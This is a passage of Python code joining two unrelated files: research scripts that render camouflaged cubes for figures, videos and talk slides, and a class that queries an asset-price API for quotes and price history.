texel_colors_rgb = texel_colors.copy() ut.toplevel_locals() #texel_colors = camo.to_color_space_2d(texel_colors) texel_colors = mesh.index_as_juv(texel_colors) out_path = '../results/real/colors.mat' scipy.io.savemat(out_path, {'texel_colors' : texel_colors, 'texel_colors_rgb' : texel_colors_rgb}) # import matlab # matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube') def make_rescomp_fig(n = None): table = [] # index frames to be consistent w/ amt results comparisons = [ ('mit-20', 3, ['occlusion-wide', 'interior-wide']), ('disrupt-14', 4, ['occlusion-wide', 'random']), ('disrupt-14', 5, ['occlusion-wide', 'random']), ('disrupt-14', 3, ['occlusion-wide', 'random']), ] #scene_acc = ut.load(STATS_PATH) #out_dir = '../results/qual-compare' out_dir = '../results/qual-compare2' ut.mkdir(out_dir) num = 0 for scene, loo_idx, methods in comparisons: scan = scan_fullres(False, path_from_scene(scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) table.append([]) for method in methods: data = ut.load(ut.pjoin(make_path('loo', method, scene), 'data_%03d.pk' % loo_idx)) texel_colors = data['ret'][0] loo_frame = scan.idx.index(data['pr'].loo_frame_idx) im = render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = True, frame_using_cube = True) assert im.shape[0] == im.shape[1] table[-1] += [method, im] #table[-1] += [method, render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = False)] ig.save(ut.pjoin(out_dir, 'result-%03d.pdf' % num), im) ig.save(ut.pjoin(out_dir, 'result-%03d.png' % num), im) num += 1 ig.show(table) def count_ims(): total = 0 for scene in ALL_SCENES: path = make_path('loo', 'interior-wide', scene) nims = len(glob.glob(path + '/result_*.jpg')) total += nims print scene, nims print 'total images', total, 'scenes', len(ALL_SCENES) def draw_grid(im, proj, spacing = [-1, 0, 1]): d = 30. for x in spacing: for y in spacing: if x < 1: im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x+1, y])], colors = (255, 255, 255)) if y < 1: im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x, y+1])], colors = (255, 255, 255)) return im def make_project_fig(): #scene = 'mit-35' scene = 'mit-37' path = make_path('noloo', 'interior-wide', scene) #texel_colors = ut.load(ut.pjoin(path, 'data.pk'))['ret'][0] scan = dset.Scan(path_from_scene(scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) scan = dset.Scan(path_from_scene(scene)) frames = range(scan.length)#[scan.length-1] #range(scan.length)[:1] geom = camo.Geom(scan, mesh) #texel = mesh.juv2tex[5, 128, 128] texel = mesh.juv2tex[2, 128, 128] table = [] for frame in frames: proj = scan.project(frame, mesh.texel_pts[texel]) im_grid = draw_grid(scan.im(frame), proj) label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom) im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False) table.append([im, scan.im(frame)]) #table.append(ig.draw_pts(im, proj)) ig.show(table) def find_best_algs(): with ut.constant_seed(): scene_acc = ut.load(STATS_PATH) for scene in ALL_SCENES: algs = ['greedy', 'interior-wide', 'occlusion-wide'] acc = [np.mean(scene_acc[scene, idx_from_alg(alg)]) for alg in algs] i = np.argmin(acc) #print scene, algs[i], acc yield scene, algs[i] def label_plane(seq, root = 0, y_flip = True): scan = dset.Scan(seq, None) _, _, tracks = dset.read_bundler(scan.bundle_file, scan.full_shape) pts = np.array([t[0] for t in tracks]) proj = scan.project(root, pts) pylab.clf() im_with_pts = ig.draw_pts(scan.im(root), proj, width = 2) pylab.imshow(im_with_pts) rect = ut.bbox2d(pylab.ginput(2, timeout = -1)) #rect = (1782.005828476269, 1431.7364696086595, 529.75936719400488, 354.40549542048279) print rect ok = ut.land(rect[0] <= proj[:, 0], proj[:, 0] <= rect[0] + rect[2], rect[1] <= proj[:, 1], proj[:, 1] <= rect[1] + rect[3]) pts_in_box = pts[ok] thresh = pylab.dist(scan.center(root), scan.center(root+1))/50. plane, _ = planefit.fit_plane_ransac(pts_in_box, thresh) if plane[1] < 0 and y_flip: plane *= -1 ins = planefit.plane_inliers(plane, pts, thresh) pylab.clf() colors = np.zeros_like(pts) colors[:, 0] = 255 colors[ins] = (0, 255, 0) im_ins = ig.draw_pts(scan.im(root), map(ut.itup, proj), map(ut.itup, colors), width = 2) pylab.clf() pylab.imshow(im_ins) print plane return plane video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'walden-log', \ 'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6'] def test_warp(par = 0, start = 0, end = None): #scenes = ['bookshelf-real']#['couch3-real', 'bookshelf-real', 'disrupt-11', 'patio2-real', 'mit-1', 'disrupt-8', 'charlottesville-2'] # 5: side # 4: usually side # 3: usually side # 2: usually side # 1: usually top # 0: usually bottom # np.array([-0.9286861 , 0.13738529, -0.34448136, -3.96361632]) scenes = [('disrupt-11', 0, 1, [], []), ('charlottesville-2', 0, 1, [], [(8, 9)]), ('mit-27', 0, 1, [np.array([ -9.06738777e-01, 2.58900135e-03, 4.21684821e-01, 2.93683015e+00])], []), ('disrupt-6', 0, 1, [np.array([ 0.85136312, 0.18874681, -0.48944405, -1.52800028])], []), ('couch3-real', 0, 1, [np.array([-0.60995728, 0.15168697, -0.77778094, -0.88194374])], []), ('couch5-real', 2, 1, [], []), ('disrupt-8', 0, 1, [np.array([-0.92784247, 0.1387372 , -0.34620851, -3.97233358])], []), ('mit-13', 0, -1, [], []), ('mit-20', 0, -1, [], []), ('bookshelf-real', 3, -1, [], [])] # ('disrupt-6', 0, 1, [], [np.array([ 0.85139516, 0.190946 , -0.48853444, -1.52601666])]), for x in ALL_SCENES: if x not in map(ut.fst, scenes): scenes.append((x, 0, 1, [], [])) #print scenes #scenes = scenes[start:end] scenes = sorted(scenes, key = lambda x : (len(video_order) if x[0] not in video_order else video_order.index(x[0]), x[0])) scenes = scenes[start:end] ip.reset(par) scene_alg = dict(find_best_algs()) #scene_names = [y[0] for y in scenes] for scene, plane_idx, order, other_planes, bad_pairs in scenes: #texel_colors = ut.load(ut.pjoin(make_path('noloo', 'interior-wide', scene), 'data.pk'))['ret'][0] alg = 'random' #scene_alg[scene] texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0] scan = dset.Scan(ut.pjoin('../data/', scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) #tour.tour(scan, mesh, texel_colors, [0, 1, 2, 3], par = par) if 0: if order == 1: frames = range(scan.length) else: frames = list(reversed(range(scan.length))) else: frames = sorted(set(map(int, np.linspace(0, scan.length-1, 6)))) if order != 1: frames = list(reversed(frames)) #print 'before mem usage' #ut.mem_usage() print scene, alg # url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, # other_planes = other_planes, bad_pairs = bad_pairs, # outline_start = 0, outline_end = 1, start_wo_outline = True, par = par) #url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, outline_start = scan.length/2, par = par) url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, par = par) f = open('../results/vid-list', 'a') print >>f, scene, alg, url f.close() #print other_planes #url = tour.tour(scan, mesh, texel_colors, [scan.length-2, scan.length-1], n = 5, plane_idx = plane_idx, other_planes = other_planes, par = par) #print 'after mem usage' #ut.mem_usage() def make_warps(): for i in xrange(len(ALL_SCENES)): os.system('python -c "import figures; figures.test_warp(par = 1, start = %d, end = %d+1)"' % (i, i)) def collect_warps(): urls = [x.split() for x in ut.lines('../results/vid-results')] base = '/data/vision/billf/aho-billf/www/tab' out = ut.make_temp_dir(dir = base) f = open(ut.pjoin(out, 'index.html'), 'w') for _, _, url in urls: last = url.split('/')[-1] path = os.path.join(base, last) page_in = open(ut.pjoin(path, 'index.html'), 'r') f.write(page_in.read() + '\n') for y in glob.glob(path + '/*.mp4'): os.system('ln -s %s %s/' % (y, out)) f.close() os.system('chmod -R a+rwx %s' % out) print ut.pjoin(imtable.PUBLIC_URL, out.split('/')[-1]) class MeshOcc: def __init__(self, scan, mask_path = None): self.scan = scan self.path = mask_path def mask(self, frame): if self.path is None: return np.zeros(self.scan.im(frame).shape[:2]) else: fname = os.path.join(self.path, 'masked%d.png'% (frame+1)) if os.path.exists(fname): mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2) mask = 255*np.array(mask, 'd') mask = ig.resize(mask, self.scan.scale, hires = 1)/255. return mask else: return np.zeros(self.scan.im(frame).shape[:2]) def apply_mask(self, im_mesh, im_nomesh, mask): return im_mesh*(1.-mask[:,:,np.newaxis]) + im_nomesh*mask[:,:,np.newaxis] def make_videos(): # order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'mit-27', 'mit-1', 'walden-log', \ # 'mit-5', 'charlottesville-1', 'couch3-real', 'disrupt-6', 'disrupt-8', 'mit-13'] print 'tmp' video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-log', \ 'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6'] vids = [] #urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-results')]) urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-list')]) base = '/data/vision/billf/aho-billf/www/tab' for scene in video_order: alg, url = urls[scene] print 'alg', alg last = url.split('/')[-1] path = os.path.join(base, last) vids.append(glob.glob(path + '/*.mp4')[0]) print '\n'.join(vids) ut.write_lines('../results/ffmpeg-vid-list', ['file %s' % s for s in vids]) os.system('ffmpeg -f concat -i ../results/ffmpeg-vid-list -c copy /data/vision/billf/aho-billf/www/camo-vid.mp4') def make_nondetect_slide(todo, par = False): ip.reset(par) scene = 'bookshelf-real' #scan = dset.Scan(ut.pjoin('../data/', scene)) #scan = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.) scan = dset.Scan(ut.pjoin('../data/', scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) frame = 6 # fix the mesh lf = frame-1 if 'move' in todo: # front plane1 = mesh.face_planes[5] # side plane2 = mesh.face_planes[4] pt1 = mesh.mesh_pts[mesh.face_idx[lf][0]] pt2 = mesh.mesh_pts[mesh.face_idx[lf][1]] table = [] # for d in np.linspace(0.8, 0.9, 5): # for d2 in np.linspace(0.05, 0.5, 5): for d in [0.85]: for d2 in [1-0.85]: #for d3 in [0.1, 0.11, 0.12, 0.15]: for d3 in [0.15]: for d4 in [0, 0.025, 0.05, 0.1]: if 1: bottom = 1 top = 0 mesh_pts = mesh.mesh_pts.copy() for i in xrange(scan.length): if i in (top, bottom): pts = mesh.mesh_pts[mesh.face_idx[i]].copy() c = np.mean(pts, axis = 0) mesh_pts[mesh.face_idx[i]] = c + d*(pts - c) if i == top: mesh_pts[mesh.face_idx[i]] -= d2*pylab.dist(pt1, pt2)*mesh.face_planes[i][:3] #mesh2 = box.Mesh(mesh.face_idx, mesh_pts) #mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane[:3]*0.07*pylab.dist(pt1, pt2)) mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane1[:3]*d3*pylab.dist(pt1, pt2)) mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane2[:3]*d4*pylab.dist(pt1, pt2)) table.append([d, d2, d3, d4] + [box.draw_faces(mesh2, scan, i) for i in scan.frames]) ig.show(table) #frame = 3 #lf = 1 lf = frame-1 d = np.linalg.norm(scan.center(lf) - scan.center(lf-1)) pt = scan.center(lf) + 1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d im = scan.im(lf) #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2] texel_colors = np.zeros((mesh.ntexels, 3)) for face in xrange(6): print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3]))) texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3]))) #texel_colors *= 225/float(np.max(texel_colors)) texel_colors *= 255/float(np.max(texel_colors)) lighting_colors = texel_colors.copy() ut.save('../results/bookshelf-lighting.pk', lighting_colors) mesh_occ = MeshOcc(scan, '../results/bookshelf-masks') def mesh_render(*args, **kwargs): kwargs['mask'] = mesh_occ.mask(args[1]) return mesh.render(*args, **kwargs) if 'lighting' in todo: ig.show([[mesh_render(scan, f, texel_colors), scan.im_with_real(f)] for f in range(scan.length)]) geom = camo.Geom(scan, mesh) if 'random' in todo: #for other_frame in xrange(scan.length): table = [] for frame1 in scan.frames: _, texel_colors = camo.project_texels(scan, frame1, mesh, scan.im(frame1), geom) table.append([]) for frame2 in scan.frames: table[-1] += [frame1, frame2, mesh_render(scan, frame2, texel_colors)] ig.show(table) if 'tour-random' in todo: #frames = [6, 0] #frames = [6, 2] frames = [6, 3] valid, proj_colors = camo.project_texels(scan, frames[0], mesh, scan.im(frames[0]), geom) texel_colors = lighting_colors.copy() texel_colors[valid] = proj_colors[valid] tour.tour(scan, mesh, texel_colors, frames, plane_idx = 3, par = par) if 'distortion-real' in todo: src_frame = 2 view_frame = 1 face = 2 scan_tour = dset.Scan(ut.pjoin('../data/', scene)) colors = lighting_colors.copy() colors[:] = 200 colors[mesh.tex2juv[:, :, 0] == face] = (0, 128, 0) table = [] valid, proj_colors = camo.project_texels(scan_tour, src_frame, mesh, scan_tour.im(src_frame), geom) colors[valid] = proj_colors table.append(mesh_render(scan_tour, view_frame, colors)) ig.show(table) if 'distortion-synthetic' in todo: proj_frame = 2 view_frame = 1 im = scan.im(proj_frame).copy() mask = box.mask(scan, mesh, proj_frame) #pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png') #pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.png') pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.jpg') #pattern = pattern.transpose([1, 0, 2]) ys, xs = np.nonzero(mask) rect = ut.bbox2d(zip(xs, ys)) s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1]) pattern = ig.resize(pattern, s) cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1)) ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern _, texel_colors = camo.project_texels(scan, proj_frame, mesh, im, geom) texel_colors = texel_colors * np.array(lighting_colors, 'd')/255. table = [] # table.append(mesh_render(scan, view_frame, texel_colors, im = 255+np.zeros_like(im))) # table.append(mesh_render(scan, proj_frame, texel_colors, im = 255+np.zeros_like(im))) table.append(mesh_render(scan, view_frame, texel_colors)) table.append(mesh_render(scan, proj_frame, texel_colors)) ig.show(table) if 'tour-cues' in todo: #ntour = 5 ntour = 40 do_tours = False #scan_tour = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.) scan_tour = dset.Scan(ut.pjoin('../data/', scene)) frames = [6, 2] valid, proj_colors = camo.project_texels(scan_tour, frames[0], mesh, scan_tour.im(frames[0]), geom) texel_colors = 0.75*lighting_colors.copy() texel_colors[valid] = proj_colors[valid] print 'distortion and occlusion boundary cues' if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour, mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par) table = [] # all table.append(mesh_render(scan_tour, frames[-1], texel_colors)) sc = 0.4 im_dark = sc*scan_tour.im(frames[-1]) table.append(sc*mesh_render(scan_tour, frames[-1], texel_colors)) ig.show(table) table.append(mesh_render(scan_tour, frames[-1], texel_colors, im = im_dark)) # distortion and occlusion #for f in [0, 6]:#xrange(6): for f in xrange(6):#xrange(6): tc = texel_colors.copy() tc[mesh.tex2juv[:, 0] != f] *= sc table.append([f, mesh_render(scan_tour, frames[-1], tc, im = im_dark)]) ig.show(table) print "what happens if we look at a view that wasn't covered?" frames2 = [2, 0] ig.show(mesh_render(scan_tour, frames[-1], tc, im = im_dark)) if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames2, n = ntour, plane_idx = 3, im_wait = 1, par = par, mesh_occ = mesh_occ) print 'we can fill it with something...' other_frame = 1 valid2, proj_colors2 = camo.project_texels(scan_tour, other_frame, mesh, scan_tour.im(other_frame), geom) texel_colors_filled = texel_colors.copy() texel_colors_filled[(-valid) & valid2] = proj_colors2[-valid & valid2] im_dark = sc*scan_tour.im(frames2[-1]) ig.show([mesh_render(scan_tour, frames2[-1], texel_colors_filled), mesh_render(scan_tour, frames2[-1], texel_colors_filled, im = im_dark)]) ig.show([mesh_render(scan_tour, f, texel_colors_filled) for f in scan.frames]) #if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, par = par) if 'test-mask' in todo: table = [] #scan = scan_fr = scan_fullres(True, scan.path) for frame in scan.frames: fname = '../results/bookshelf-masks/im%d-colored.png' % (frame+1) if os.path.exists(fname): mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2) mask = 255*np.array(mask, 'd') mask = ig.resize(mask, scan.scale, hires = 1)/255. #mask = np.array(ig.resize(np.array(mask, 'd'), scan.scale, order = 1, hires = 0)) #ig.show(mask) im = box.draw_faces(mesh, scan, frame) if 0: im[mask] = scan.im(frame)[mask] if 1: im = im*(1.-mask[:,:,np.newaxis]) + mask[:,:,np.newaxis]*scan.im(frame) table.append(im) ig.show(table) if 'mask' in todo: scan_fr = scan_fullres(True, scan.path) ig.show([[scan_fr.im(f), box.draw_faces(mesh, scan_fr, f)] for f in scan_fr.frames]) if 'zebra' in todo: table = [] # for frame1 in scan.frames: # for other_frame in scan.frames: #[scan.length-1]: for frame1 in [6]: for other_frame in [4]: #[scan.length-1]: im = scan.im(other_frame).copy() mask = box.mask(scan, mesh, other_frame) pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png') pattern = pattern.transpose([1, 0, 2]) ys, xs = np.nonzero(mask) #cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1)) rect = ut.bbox2d(zip(xs, ys)) s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1]) print s pattern = ig.resize(pattern, s) #ig.sub_img(im, rect)[:] = pattern cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1)) ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern _, texel_colors = camo.project_texels(scan, other_frame, mesh, im, geom) texel_colors = texel_colors * np.array(lighting_colors, 'd')/255. table.append([frame1, other_frame, mesh_render(scan, frame1, texel_colors), mesh_render(scan, frame1, lighting_colors), scan.im_with_real(frame1)]) ig.show(table) def make_octopus_video(): vids_in = ['../results/Ovulg_Wow_sequence_Silent_RTHWatermark.mov', '../results/Octopus Vulgaris.mov'] #clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mov'] clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mp4'] times = ['-ss 00:00:00 -t 10', '-ss 00:05:48 -t 12.5'] # for vid, clip, time in zip(vids_in, clips, times): # os.system('ffmpeg -i "%s" %s "%s"' % (vid, time, clip)) ut.write_lines('../results/ffmpeg-octopus-list', ['file %s' % s for s in clips]) os.system('ffmpeg -f concat -i ../results/ffmpeg-octopus-list -c copy ../results/octopus-talk.mp4') print 'scp', '[email protected]:' + os.path.abspath('../results/octopus-talk.mp4'), '~/Dropbox/cvpr-talk/octopus-talk.mp4' def spotlight_slides(par = 1): scene = 'charlottesville-3' alg = 'occlusion-wide' scan = dset.Scan(ut.pjoin('../data/', scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) #texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0] #lighting_colors = ut.load('../results/bookshelf-lighting.pk') frame = 0 lf = 4 d = np.linalg.norm(scan.center(lf) - scan.center(lf-1)) pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d im = scan.im(lf) #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2] texel_colors = np.zeros((mesh.ntexels, 3)) for face in xrange(6): print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3]))) texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3]))) texel_colors *= 255/float(np.max(texel_colors)) lighting_colors = texel_colors im = mesh.render(scan, frame, lighting_colors) #ig.show(ig.resize(im, 0.5)) texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0] im_colored = mesh.render(scan, frame, texel_colors) ig.show([im, im_colored]) plane_idx = 0 url = tour.tour(scan, mesh, texel_colors, range(scan.length), plane_idx = plane_idx, par = par, start_scale = 0) ig.show(url) def make_occ_examples(texel_colors=None): ut.seed_rng(0) scene = 'walden-brush2' if 0: #alg = 'greedy' #texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0] #render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True) scan_fr = dset.Scan(ut.pjoin('../data', scene), max_dim = None) mesh = box.load_from_mat(ut.pjoin(scan_fr.path, 'cube.mat'), 512) if texel_colors is not None: try: texel_colors = camo.camo(scan_fr, mesh, ut.Struct(method = 'greedy'))[0] except: print 'exception' ut.toplevel_locals() if 1: scan = dset.Scan(ut.pjoin('../data', scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) table = [] view_frame = 2 for frame in scan.frames: try: texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0] table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = False, frame_using_cube = True)]) except: print 'exception' ig.show(table) return frame = 2 im_bg = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, show_cube = False) ig.show(im_bg) im_nooutline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True) im_outline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True) ig.show([im_bg, im_nooutline, im_outline]) def make_occlusion_slide(): #scan = dset.Scan('../data/disrupt-14') #scan = dset.Scan('../data/walden-tree1') scan = dset.Scan('../data/mit-13', max_dim = None) #mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), 1024) # table = [] # for frame in scan.frames: # view_frame = frame # texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0] # table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = True, frame_using_cube = True)]) # ig.show(table) #texel = mesh.juv2tex[2, 128, 128] #texel = mesh.juv2tex[2, 0, 128] #texel = mesh.juv2tex[2, 0, 128] texel = mesh.juv2tex[5, 0, 128] geom = camo.Geom(scan, mesh) table = [] for frame in [0, 2, 4, 6]:#scan.frames:#[0, 1, 4]: #table.append(scan.im(frame)) proj = scan.project(frame, mesh.texel_pts[texel]) if 1: im_grid = draw_grid(scan.im(frame), proj, spacing = [0]) else: im_grid = scan.im(frame) label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom) #im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False) im_nooutline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True) im_outline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True) #im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False) table.append([str(frame), im_outline, im_nooutline]) #table.append([str(frame), im, scan.im(frame)]) #table.append(ig.draw_pts(im, proj)) ig.show(table) def make_capture_slide(): scene = 'mit-37' scan = dset.Scan(ut.pjoin('../data', scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) if 'lighting': lf = 13 d = np.linalg.norm(scan.center(lf) - scan.center(lf-1)) pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d #im = scan.im(lf) #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2] texel_colors = np.zeros((mesh.ntexels, 3)) for face in xrange(6): print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3]))) texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3]))) texel_colors *= 255/float(np.max(texel_colors)) lighting_colors = texel_colors # geom = camo.Geom(scan, mesh) # #texel = mesh.juv2tex[5, 128, 128] # texel = mesh.juv2tex[2, 128, 128] frames = [8, 10, 13, 15] #ig.show([[mesh.render(scan, frame, lighting_colors), scan.im(frame)] for frame in frames]) f1 = 10 f2 = 14 #f2 = 8 geom = camo.Geom(scan, mesh) label_valid, tc1 = camo.project_texels(scan, f1, mesh, scan.im(f1), geom) label_valid, tc2 = camo.project_texels(scan, f2, mesh, scan.im(f2), geom) tc = tc1.copy() #ok = label_valid & (mesh.tex2juv[:, 0] == 2) & (mesh.tex2juv[:, 1] > 128) ok = (mesh.tex2juv[:, 0] == 1) | (mesh.tex2juv[:, 0] == 5) | (mesh.tex2juv[:, 0] == 3) ok = (mesh.tex2juv[:, 1] > 128) tc[ok] = tc2[ok] #ig.show(mesh.render(scan, f1, tc)) vf = f1 c1 = render_cube(scan.path, mesh, tc1, vf, 200, outline = True, frame_using_cube = True) c2 = render_cube(scan.path, mesh, tc2, vf, 200, outline = True, frame_using_cube = True) ch = render_cube(scan.path, mesh, tc, vf, 200, outline = True, frame_using_cube = True) ig.show([c1, c2, ch]) return # c1 = mesh.render(scan, vf, tc1) # c2 = mesh.render(scan, vf, tc2) c1 = c2 = '' ch = mesh.render(scan, vf, tc) ig.show([c1, c2, ch]) # def make_camo_game(): # tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour, # mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)
import urllib3.request import json import datetime as dt from urllib3 import exceptions as urlex from Game.periodictasks.search_alarms import AlarmSearch import pandas as pn import numpy as np DATE_FORMAT = '%Y-%m-%d' def str_to_date(strdate): """ parses given string to date using global date format :param strdate: :return date: """ return dt.datetime.strptime(strdate, DATE_FORMAT) class AssetComunication: GET_ASSETS = "getAvailableAssets/" GET_QUOTE = "getAssetMarketPrice/" GET_HISTORY = "getAssetHistory/" def __init__(self, url): self.API_URL = url self.alarm_search = AlarmSearch(acom=self) @staticmethod def has_quote(asset): """ check if an asset has a valid quote :param asset: :return boolean: """ return asset.buy != -1 and asset.sell != -1 @staticmethod def url_to_json(url): """ fetch json data from given url :param url: :return json_response if success, 0 otherwise: """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http = urllib3.PoolManager() try: res = http.request('GET', url) if res.status == 200: return json.loads(res.data.decode()) else: return 0 except urlex.MaxRetryError: return 0 def get_asset_names(self): """ fetch from API all the available assets (only names) :return asset list: """ from Game.models import Asset url = self.API_URL + self.GET_ASSETS json_assets = self.url_to_json(url) asset_list = [] try: if json_assets != 0: json_assets = json_assets['availableAssets'] for a in json_assets: asset = Asset(name=a['name'], type=a['type']) asset_list.append(asset) return asset_list except KeyError: # rollback asset_list = [] finally: return asset_list def get_asset_quote(self, asset): """ given an asset (only name is required) returns same asset with buy and sell price if both exists also searchs for alarms for the given asset. :param asset: :return asset: """ url = self.API_URL + self.GET_QUOTE + asset.name asset_quote = self.url_to_json(url) try: if asset_quote != 0: asset.buy = asset_quote['buy'] asset.sell = asset_quote['sell'] except KeyError: # rollback asset.buy = -1 asset.sell = -1 finally: self.alarm_search.search_for_alarms(asset=asset) return asset def get_asset_type(self, name): assets = self.get_asset_names() for a in assets: if name == a.name: return a.type return None def quote_for_assets(self, assets): """ maps asset list (only names are required) with same assets with quote :param assets: :return asset list: """ return [self.get_asset_quote(a) for a in assets if self.has_quote(self.get_asset_quote(a))] def get_assets(self): """ fetches all the available assets with their respective quotes :return asset list: """ assets = self.get_asset_names() return self.quote_for_assets(assets) def get_asset_history(self, name, start_date, end_date): """ get all history for given asset :param name: :param start_date: :param end_date: :return dict [{day: DayString, sell: SELL_PRICE, buy: BUY_PRICE}]: """ url = (self.API_URL + self.GET_HISTORY + name + "/" + start_date + "/" + end_date) prices = self.url_to_json(url) if prices == 0: prices = {'error': True} return prices def average_for_asset(self, asset): start_date = dt.date.today() - dt.timedelta(days=365 * 2) end_date = dt.date.today() history = self.get_asset_history(name=asset.name, start_date=start_date .strftime(DATE_FORMAT), end_date=end_date .strftime(DATE_FORMAT)) try: prices = history['prices'] sell = [float(p['sell']) for p in prices] sell_df = pn.DataFrame(np.array(sell)) sell_data = sell_df.quantile([0.25, 0.5, 0.75]).to_dict()[0] sell_data['first'] = 